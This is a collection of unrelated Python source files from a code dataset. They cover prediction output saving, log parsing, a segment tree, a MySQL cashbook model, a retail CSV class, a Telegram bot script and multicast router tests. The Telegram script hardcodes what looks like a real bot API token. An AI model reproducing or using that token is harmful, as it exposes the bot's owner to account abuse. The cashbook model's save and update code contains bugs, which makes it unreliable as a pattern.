predictions_patient, namelist_patient = patient_res_m3_oneshop(scores_patch, namelist_patch, num_classes)\n patient_results = save_results(namelist_patient, scores_patient[:, 1], predictions_patient, num_classes)\n with open(os.path.join(root_dir, model_type, 'patient.json'), 'w') as f:\n json.dump(patient_results[0], f)\n \n savename_patient = os.path.join(root_dir, model_type, 'patient.npz')\n np.savez(savename_patient, key_score=scores_patient, key_binpred=predictions_patient, key_namelist=namelist_patient)\n\n with open(os.path.join(root_dir, model_type, 'prediction.json'), 'w') as f:\n results = {\n \"model\": model_type,\n \"patient\": patient_results[0],\n \"patch\": patch_results\n }\n json.dump(results, f)\n","sub_path":"PIK3CA_mutation/single_prediction.py","file_name":"single_prediction.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"392658154","text":"for num in range(1, 2):\r\n\r\n time = []\r\n total_flag = 0\r\n asterisk_flag = 0\r\n filename = \"New-Step\" + str(num) + \".txt\"\r\n for line in reversed(list(open(filename))):\r\n if line.startswith('Total (root+branch&cut)'):\r\n total_flag = 1\r\n continue\r\n\r\n if line.startswith('*'):\r\n asterisk_flag = 1\r\n continue\r\n\r\n if total_flag and asterisk_flag and line.startswith('Elapsed time'):\r\n pos1 = line.find('=')\r\n pos2 = line.find('sec.', pos1)\r\n time.append((line[pos1+1:pos2]).strip())\r\n total_flag = 0\r\n asterisk_flag = 0\r\n\r\n print(sum([float(time_point) for time_point in time]))\r\n","sub_path":"extract_time_new.py","file_name":"extract_time_new.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557363510","text":"\"\"\"\nDefinition of Interval.\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\nclass SegmentTreeNode(object):\n def __init__(self, start, end, min):\n self.start, self.end, self.min = start, end, min\n self.left, self.right = None, None\n\nclass Solution:\t\n \"\"\"\n @param A, queries: Given an integer array and an Interval list\n The ith query is [queries[i-1].start, queries[i-1].end]\n @return: The result list\n \"\"\"\n\n def build(self, A, start, end):\n if start > end:\n return\n\n root = SegmentTreeNode(start, end, None)\n if start != end:\n mid = (start + end) / 2\n root.left = self.build(A, start, mid)\n root.right = self.build(A, mid+1, end)\n root.min = min(root.left.min, root.right.min)\n else:\n root.min = A[start]\n\n return root\n\n def query(self, root, start, end):\n if root.start == start and root.end == end:\n return root.min\n\n mid = (root.start + root.end) / 2\n lmin, rmin = None, None\n if start <= mid:\n if end <= mid:\n return self.query(root.left, start, end)\n else:\n lmin = self.query(root.left, start, mid)\n \n if end > mid:\n if start > mid:\n return self.query(root.right, start, end)\n else:\n rmin = self.query(root.right, mid+1, end)\n \n return min(lmin, rmin) if lmin is not None and rmin is not None \\\n else max(lmin, rmin)\n \n\n\n def intervalMinNumber(self, A, queries):\n root = self.build(A, 0, len(A)-1)\n\n res = []\n for query in queries:\n res.append(self.query(root, query[0], query[1]))\n\n return res\n \nif __name__ == '__main__':\n s = Solution()\n s.intervalMinNumber([1, 2, 7, 8, 5], [[1,2],[0,4],[2,4]])","sub_path":"SegmentTree/IntervalMinimumNumber.py","file_name":"IntervalMinimumNumber.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"478397494","text":"import MySQLdb\nimport datetime\nfrom decimal import Decimal\n\nfrom db import DBConnector\nfrom model.project import project\n\nclass cashbook:\n \"\"\"現金出納帳モデル\"\"\"\n\n def __init__(self):\n self.attr = {}\n self.attr[\"id\"] = None\n self.attr[\"user_id\"] = None\n self.attr[\"ym\"] = None\n self.attr[\"date\"] = None\n self.attr[\"summary\"] = None\n self.attr[\"detail\"] = None\n self.attr[\"income\"] = None\n self.attr[\"expenses\"] = None\n self.attr[\"amount\"] = None\n self.attr[\"last_updated\"] = None\n\n @staticmethod\n def migrate():\n\n # データベースへの接続とカーソルの生成\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n # データベース生成\n cursor.execute('CREATE DATABASE IF NOT EXISTS db_%s;' % project.name())\n # 生成したデータベースに移動\n cursor.execute('USE db_%s;' % project.name())\n # テーブル初期化(DROP)\n cursor.execute('DROP TABLE IF EXISTS table_cashbook;')\n # テーブル初期化(CREATE)\n cursor.execute(\"\"\"\n CREATE TABLE `table_cashbook` (\n `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n `user_id` int(11) unsigned NOT NULL,\n `ym` int(11) NOT NULL,\n `date` date NOT NULL,\n `summary` varchar(255) DEFAULT NULL,\n `detail` text,\n `income` decimal(12,0) NOT NULL DEFAULT '0',\n `expenses` decimal(12,0) NOT NULL DEFAULT '0',\n `amount` decimal(12,0) NOT NULL DEFAULT '0',\n `last_updated` datetime NOT NULL,\n PRIMARY KEY (`id`),\n KEY `user_id` (`user_id`),\n KEY `summary` (`summary`)\n )\"\"\")\n con.commit()\n\n @staticmethod\n def db_cleaner():\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n cursor.execute('DROP DATABASE IF EXISTS db_%s;' % project.name())\n con.commit()\n\n @staticmethod\n def find(id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE id = %s;\n \"\"\", (id,))\n results = cursor.fetchall()\n\n if (len(results) == 0):\n return None\n data = results[0]\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n return cb\n\n def is_valid(self):\n return all([\n self.attr[\"id\"] is None or type(self.attr[\"id\"]) is int,\n self.attr[\"user_id\"] is not None and type(self.attr[\"user_id\"]) is int,\n self.attr[\"ym\"] is not None and type(self.attr[\"ym\"]) is int and len(str(self.attr[\"ym\"])) == 6,\n self.attr[\"date\"] is not None and type(self.attr[\"date\"]) is datetime.date,\n self.attr[\"summary\"] is not None and type(self.attr[\"summary\"]) is str and len(self.attr[\"summary\"]) > 0,\n self.attr[\"detail\"] is None or type(self.attr[\"detail\"]) is str,\n self.attr[\"income\"] is not None and type(self.attr[\"income\"]) is Decimal,\n self.attr[\"expenses\"] is not None and type(self.attr[\"expenses\"]) is Decimal,\n self.attr[\"amount\"] is not None and type(self.attr[\"amount\"]) is Decimal and self.attr[\"amount\"] == self.attr[\"income\"] - self.attr[\"expenses\"],\n self.attr[\"last_updated\"] is not None and type(self.attr[\"last_updated\"]) is datetime.datetime\n ])\n\n\n @staticmethod\n def build():\n now = datetime.datetime.now()\n cb = cashbook()\n # defaultが設定されている変数はdefault値にしておくと良い\n # 日付も予め値が入っていた方が良い\n # 入力が必要な物はNoneのままにしておく\n cb.attr[\"ym\"] = now.year*100 + now.month\n cb.attr[\"date\"] = now.date()\n #cb.attr[\"summary\"] = None\n #cb.attr[\"detail\"] = None\n cb.attr[\"income\"] = Decimal(0)\n cb.attr[\"expenses\"] = Decimal(0)\n cb.attr[\"amount\"] = Decimal(0)\n cb.attr[\"last_updated\"] = now\n return cb\n\n def save(self):\n if(self.is_valid):\n return self._db_save()\n return False\n\n def _db_save(self):\n if self.attr[\"id\"] == None:\n return self._db_save_insert()\n return self._db_save_update()\n\n def _db_save_insert(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(INSERT)\n cursor.execute(\"\"\"\n INSERT INTO table_cashbook\n (user_id, ym, date, summary, detail, income, expenses, amount, last_updated)\n VALUES\n (%s, %s, %s, %s, %s, %s, %s, %s, %s); \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"])))\n \n # INSERTされたAUTO INCREMENT値を取得\n cursor.execute(\"SELECT last_insert_id();\")\n results = cursor.fetchone()\n self.attr[\"id\"] = results[0]\n\n con.commit()\n\n return self.attr[\"id\"]\n \n def _db_save_update(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(UPDATE)\n cursor.execute(\"\"\"\n UPDATE table_cashbook\n SET user_id = %s,\n ym = %s,\n date = %s,\n summary = %s,\n detail = %s,\n income = %s,\n expenses = %s,\n amount = %s,\n last_updatedemail = %s\n WHERE id = %s; \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"]),\n self.attr[\"id\"]))\n con.commit()\n \n return self.attr[\"id\"]\n\n @staticmethod\n def select_by_user_id(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE user_id = %s;\n \"\"\", (user_id,))\n results = cursor.fetchall()\n \n records = []\n for data in results:\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n records.append(cb)\n\n return records\n \n def delete(self):\n if self.attr[\"id\"] == None: return None\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの削除(DELETE)\n cursor.execute(\"\"\"\n DELETE FROM table_cashbook\n WHERE id = %s; \"\"\",\n (self.attr[\"id\"],))\n con.commit()\n\n return self.attr[\"id\"]\n \n @staticmethod\n def _index(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE user_id = %s; \"\"\",\n (user_id,))\n con.commit()\n recodes = cursor.fetchall()\n \n ids = [recode[0] for recode in recodes]\n return ids\n\n \n @staticmethod\n def summary(user_id, summary):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n cursor.execute(\"\"\"\n SELECT id\n FROM table_cashbook\n WHERE user_id = %s and summary = %s\n ORDER BY date ASC;\n \"\"\",(user_id,summary,))\n con.commit()\n recodes = cursor.fetchall()\n\n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n\n @staticmethod\n def ym(user_id, ym):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE `user_id` = %s and `ym` = %s; \"\"\",\n (user_id, ym))\n con.commit()\n recodes = cursor.fetchall()\n \n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n","sub_path":"app/model/cashbook.py","file_name":"cashbook.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584096121","text":"class StyleInfo:\n\n\tDELIMITER = ','\n\n\tdef __init__(self, csvData):\t\t\n\t\tself.StyleColor = csvData[0]\n\t\tself.USDEPTretail = csvData[1]\n\t\tself.DIV2 = csvData[2]\n\t\tself.DEL2 = csvData[3]\n\t\tself.Wxx2 = csvData[4]\n\t\tself.Wxx1 = csvData[5]\n\t\tself.Wxx = csvData[6]\n\t\tself.RETAILSALESINEUROSWxx2 = csvData[7]\n\t\tself.RETAILSALESINEUROSWxx1 = csvData[8]\n\t\tself.RETAILSALESINEUROSWxx = csvData[9]\n\t\tself.GMw1shortage = csvData[10]\n\t\tself.POS = csvData[11]\n\t\tself.OHStoreLC = csvData[12]\n\t\tself.OHWHSPLC = csvData[13]\n\t\tself.TTLOHLC = csvData[14]\n\t\tself.YEAR = csvData[15]\n\t\tself.Dateofextraction = csvData[16]\n\t\tself.Brand = csvData[17]\n\t\tself.numofStores = csvData[18]\n\t\tself.USConfDpt = csvData[19]\n\t\tself.Usdept = csvData[20]\n\t\tself.Usdeptdescription = csvData[21]\n\t\tself.Dpt = csvData[22]\n\t\tself.DIV = csvData[23]\n\t\tself.DEPT = csvData[24]\n\t\tself.AMSSN = csvData[25]\n\t\tself.Delivery = csvData[26]\n\t\tself.DEL = csvData[27]\n\t\tself.DELSSN = csvData[28]\n\t\tself.AMSTYLECLR = csvData[29]\n\t\tself.AMStyle = csvData[30]\n\t\tself.Amcolor = csvData[31]\n\t\tself.Firstdistrodate = csvData[32]\n\t\tself.FIRSTDISTRO = csvData[33]\n\t\tself.ESSENTIALREORDER = csvData[34]\n\t\tself.amp = csvData[35]\n\t\tself.FAB = csvData[36]\n\t\tself.BCBGStyle = csvData[37]\n\t\tself.BCBGColor = csvData[38]\n\t\tself.CLRDESC = csvData[39]\n\t\tself.CLS = csvData[40]\n\t\tself.STYLEDESC = csvData[41]\n\t\tself.Styledescription = csvData[42]\n\t\tself.FobCostEuro = csvData[43]\n\t\tself.LandedCostEuro = csvData[44]\n\t\tself.Retailprice = csvData[45]\n\t\tself.RetailpriceEuroArea = csvData[46]\n\t\tself.RTLOHSTR_NOTAX = csvData[47]\n\t\tself.RTLOHWHSPHYS = csvData[48]\n\t\tself.RTLOHTTL_NOTAX = csvData[49]\n\t\tself.UnitsOHStores = csvData[50]\n\t\tself.UnitsOHWhsAvailable = csvData[51]\n\t\tself.UnitsOHWhsPhysical = csvData[52]\n\t\tself.TTLUNITS = csvData[53]\n\t\tself.INSTOREAPS = csvData[54]\n\t\tself.AURSLS = csvData[55]\n\t\tself.W47 = csvData[56]\n\t\tself.W48 = csvData[57]\n\t\tself.W49 = csvData[58]\n\t\tself.W50 = csvData[59]\n\t\tself.W51 = csvData[60]\n\t\tself.W52 = csvData[61]\n\t\tself.W1 = csvData[62]\n\t\tself.W2 = csvData[63]\n\t\tself.W3 = csvData[64]\n\t\tself.WOWbuild = csvData[65]\n\t\tself.RetailSalesMTD = csvData[66]\n\t\tself.MarkdownMTD = csvData[67]\n\t\tself.UnitssalesYTD = csvData[68]\n\t\tself.RetailsalesYTD = csvData[69]\n\t\tself.SALESMD = csvData[70]\n\t\tself.MarkdownYTD = csvData[71]\n\t\tself.StoreUnitSTW3 = csvData[72]\n\t\tself.StoreUnitWOSW3 = csvData[73]\n\t\tself.YTDST = csvData[74]\n\t\tself.RetailsalesinEurosW47 = csvData[75]\n\t\tself.RetailsalesinEurosW48 = csvData[76]\n\t\tself.RetailsalesinEurosW49 = csvData[77]\n\t\tself.RetailsalesinEurosW50 = csvData[78]\n\t\tself.RetailsalesinEurosW51 = csvData[79]\n\t\tself.RetailsalesinEurosW52 = csvData[80]\n\t\tself.RetailsalesinEurosW1 = csvData[81]\n\t\tself.RetailsalesinEurosW2 = csvData[82]\n\t\tself.RetailsalesinEurosW3 = csvData[83]\n\t\tself.MarkdownInEurosW3 = csvData[84]\n\t\tself.RetailsalesinEurosW4 = csvData[85]\n\t\tself.Receiptssize2 = csvData[86]\n\t\tself.Receiptssize3 = csvData[87]\n\t\tself.Receiptssize4 = csvData[88]\n\t\tself.Receiptssize5 = csvData[89]\n\t\tself.Receiptssize6 = csvData[90]\n\t\tself.Receiptssize7 = csvData[91]\n\t\tself.Receiptssize8 = csvData[92]\n\t\tself.Receiptssize9 = csvData[93]\n\t\tself.Receiptssize10 = csvData[94]\n\t\tself.Receiptssize11 = csvData[95]\n\t\tself.Receiptssize12 = csvData[96]\n\t\tself.TOTALRECEIPTS = csvData[97]\n\t\tself.ReturnTransit = csvData[98]\n\t\tself.Shipmenttransit = csvData[99]\n\t\tself.FactorypriceEuro = csvData[100]\n\t\tself.BRAND = csvData[101]\n\t\tself.FOCUS = csvData[102]\n\t\tself.DAYEVE = csvData[103]\n\t\tself.GBB = csvData[104]\n\t\tself.SSFWMDLIST = csvData[105]\n\t\tself.x = csvData[106]\n\t\tself.x = csvData[107]\n\t\tself.x = csvData[108]\n\t\tself.SSMDLISTPP = csvData[109]\n\t\tself.MD_HARD_POS = csvData[110]\t\t\n\t\tself.MD_HARD_POS_REG = csvData[111]\n\t\tself.HARDMARK_REG = csvData[112]\n\t\tself.OLD = csvData[113]\n\t\tself.INSTORE_WHS_not_OLD = csvData[114]\n\t\tself.PE = csvData[115]\n\t\t\n\tdef reduced(self):\t\t\n\t\tsinfo = self.Brand + self.DELIMITER + self.DIV + self.DELIMITER\n\t\tsinfo += self.AMSSN + self.DELIMITER + self.Delivery + self.DELIMITER\n\t\tsinfo += self.AMStyle + self.DELIMITER + self.Amcolor + self.DELIMITER\n\t\tsinfo += self.StyleColor + self.DELIMITER + self.BCBGStyle + self.DELIMITER\n\t\tsinfo += self.BCBGColor + self.DELIMITER + self.CLRDESC + self.DELIMITER\n\t\tsinfo += self.STYLEDESC + self.DELIMITER + self.Retailprice\n\t\treturn sinfo","sub_path":"styleinfo.py","file_name":"styleinfo.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9848587","text":"import json\nimport requests\n\n\"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n# r = requests.get(URLbot + 'getMe')\n# write_json(r.json())\n\nURL = 'https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/'\n\n\ndef write_json(data, filename = 'answer.json'):\n \"\"\"Получение json данных в файл\"\"\"\n with open(filename, 'w') as f:\n json.dump(data, f, indent=2,\n ensure_ascii=False)\n\n\ndef get_updates():\n \"\"\" Запрос обновлений в чате бота https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getUpdates\"\"\"\n url = URL + 'getUpdates'\n r = requests.get(url)\n #write_json(r.json())\n return r.json()\n\n\ndef send_message(chat_id, text = 'Test'):\n \"\"\"Отправка сообщений в чат бота\"\"\"\n url = URL + 'sendMessage'\n answer = { # словарь для передачи методом post\n 'chat_id': chat_id,\n 'text': text\n }\n r = requests.post(url, json = answer)\n return r.json()\n\n\ndef main():\n \"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n r = requests.get(URL + 'getMe')\n write_json(r.json())\n\nif __name__ == '__main__':\n # main()\n r = get_updates()\n # Распарсить ответ от Telegram:\n chat_id = r['result'][-1]['message']['chat']['id']\n send_message(chat_id, 'Текст')","sub_path":"testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"289396065","text":"'''\nCreated on Feb 9, 2016\n\n@author: alex\n'''\nimport types\nimport unittest\nimport math\n\nfrom des.entities.network_entity import NetworkEntity\nfrom des.entities.node import Node\nfrom des.event.network import NetworkEvent\nfrom pim_dm.router.router import Router\nfrom pim_dm.router.tree.downstream.interface_state import Downstream\nimport pim_dm.router.tree.downstream.state as down_sm\nimport pim_dm.router.tree.pim_assert.state as assert_sm\nfrom pim_dm.router.tree.tree_id import TreeId\nfrom pim_dm.router.tree.tree_interface import TreeInterface\nfrom pim_dm.router.tree.upstream.interface_state import Upstream\nimport pim_dm.router.tree.upstream.state as up_sm\nfrom tests.test_base import TestBase, Object\nfrom topologies import test_base_topo\n\nclass TestPIM(TestBase):\n def setUp(self):\n settings = Object()\n settings.NODES = test_base_topo.pim\n\n TestBase.setUp(self, settings=settings)\n\n self.sim_setup()\n\n def set_members(self, node: str, value: bool, time=None) -> None:\n r_t = NetworkEntity.get(node)._daemons[Router.NAME]\n\n def _set_mm():\n r_t.set_has_members(value)\n\n if time is None:\n _set_mm()\n else:\n assert isinstance(time, (int, float))\n self.schedule_action(time, _set_mm)\n\n def _get_S(self) -> Node:\n '''\n @rtype: Node\n '''\n return NetworkEntity.get('S')\n\n def _get_SG(self) -> tuple:\n '''\n @rtype: Node\n '''\n return TreeId(self._get_S(), 'g1')\n\n def _schedule_missfire(self, time: float, rname: str, sname: str, fname:\n str):\n \"\"\"\n Schedules a msg to be \"lost\" at a given time.\n This is done by replacing the function which sends the msg by _msg_missfire\n \"\"\"\n\n # so that the Join msg is not sent,\n # but the object must exist and be instantized therefore 26 secs\n def _msg_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n n_sn.rprint(\"dropping message: \" + fname)\n\n # In python methods and functions are different types.\n # The MethodType is then necessary to bind a function to a\n # object instance as to correctly pass 'self' to the function (or method)\n # http://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance\n setattr(n_sn, fname, types.MethodType(\n getattr(TreeInterface, fname), n_sn))\n\n def _set_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n\n setattr(n_sn, fname, _msg_missfire)\n\n self.schedule_action(time, _set_missfire)\n\n def assert_routers(self, tests) -> dict:\n \"\"\"\n performs asserts for interfaces and state machines\n\n and places entities in the returned dict in the following format\n\n entries in tests must be in either\n [, ,\n Downstream, NoInfoState|Winner|Loser, NoInfoState|Prunned|PrunnedPending|None]\n or\n [, ,\n Upstream, NoInfoState|Winner|Loser, Forword|Prunned|AckPending|None]\n\n rts[S] for source\n rts[sn1] for subnet 1, which are load as need by paramter t[1]\n rts[A] for routers\n rts[A_t] for pim tree\n rts[A_sn1] for tree interface\n \"\"\"\n\n rts = dict()\n S = rts['S'] = NetworkEntity.get('S')\n try:\n for t in tests:\n # get subnet\n sn_name = t[1]\n if sn_name not in rts:\n rts[sn_name] = NetworkEntity.get(sn_name)\n sn = rts[sn_name]\n\n # use: rts['A']\n r_name = t[0]\n r = rts[r_name] = NetworkEntity.get(r_name)._daemons[\n Router.NAME]\n\n # use: rts['A_t']\n r_t = r.get_tree(TreeId(S, 'g1'))\n rts[\"{}_t\".format(r_name)] = r_t\n\n r_sn = r_t._tree_ifs[sn]\n\n expected_if_type = t[2]\n self.assertIsInstance(\n r_sn._if_state, expected_if_type,\n \"{}_{} is not instanceof {}\".format(r_name, sn_name, t[2]))\n\n # use: rts['A_sn1']\n rts[\"{}_{}\".format(r_name, sn_name)] = r_sn\n\n expected_assert_state = t[3]\n expected_prune_state = t[4]\n\n # winner/looser/None\n if expected_assert_state:\n self.assertIsInstance(\n r_sn._assert_state, expected_assert_state,\n \"{}_{} \\nis in state {}\\n but should be in {}\".format(\n r_name, sn_name, r_sn._assert_state,\n expected_assert_state))\n\n # Forword|Prunned|AckPending|None if Upstream\n # NoInfoState|Prunned|PrunnedPending|None if Downstream\n\n if expected_prune_state:\n self.assertIsInstance(\n r_sn._if_state._state, expected_prune_state,\n \"{}_{} \\n\\tis in state {}\\n\\tbut should be in {}\".format(\n r_name, sn_name, r_sn._if_state._state,\n expected_prune_state))\n\n except Exception as e:\n # better debug info\n ret = [str(cell) for cell in t]\n #sn = sn.__name__\n print(ret)\n\n raise e\n\n return rts\n\n def test_1_1(self):\n # Assemble\n self.set_topo([('S', ('sn0', 1)), ('A', ('sn0', 1)), ])\n\n # Act\n NetworkEvent.join_node_link(40, \"A\", 'sn1', 1)\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn0', Upstream, assert_sm.NoInfoState, up_sm.ForwardState),\n ('A', 'sn1', Downstream, None, None),\n ])\n\n def test_1_2(self):\n # Assemble\n self.set_topo([('S', ('sn0', 1)), ('A', ('sn0', 1), ('sn1', 1)), ])\n\n # Act\n NetworkEvent.join_node_link(40, \"C\", 'sn1', 1)\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n ),\n ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.ForwardState),\n ])\n\n def test_1_3(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n for n in ('A', 'B'):\n self.set_members(n, False)\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'C', 'sn1')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n self.assertIn(rts['sn1'], set(i.pim_if.link\n for i in (rts['A_t'].olist)))\n\n def test_1_4(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n for n in ('A', 'B'):\n self.set_members(n, False)\n\n # Act\n self.schedule_action(45, lambda: self.set_members('C', False))\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n def test_2_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1), ('sn2', 1)),\n ('E', ('sn2', 1)),\n ])\n\n for n in ('A', 'C'):\n self.set_members(n, False)\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'E', 'sn2')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.PrunnedState),\n ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.PrunedState),\n ('C', 'sn2', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(len(rts['C_t'].olist), 0, \"Olist should be empty\")\n\n def test_2_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1), ('sn2', 1)),\n ])\n for r in ('A', 'C'):\n self.set_members(r, False)\n\n # Act\n NetworkEvent.join_node_link(40.0, 'E', 'sn2')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.PrunnedState),\n ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.PrunedState),\n ('C', 'sn2', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n ),\n ('E', 'sn2', Upstream, None, up_sm.ForwardState),\n ])\n\n self.assertEqual(\n len(rts['C_t'].olist), 1, \"Olist should have 1 element (router C)\")\n\n def test_2_3(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 3)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n NetworkEvent.join_node_link(40, 'C', 'sn1', 1)\n\n # at 50 seconds a new data msg is sent\n # assert that A is prunned\n self.schedule_action(48, _assert)\n self.schedule_action(52, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 1, \"Olist should have 1 interface\")\n\n def test_2_4(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 3)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n # assert that A in winner AND it's prunned\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n # at 85 seconds the state refresh msg is sent\n NetworkEvent.join_node_link(110, 'C', 'sn1', 1)\n self.schedule_action(115, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 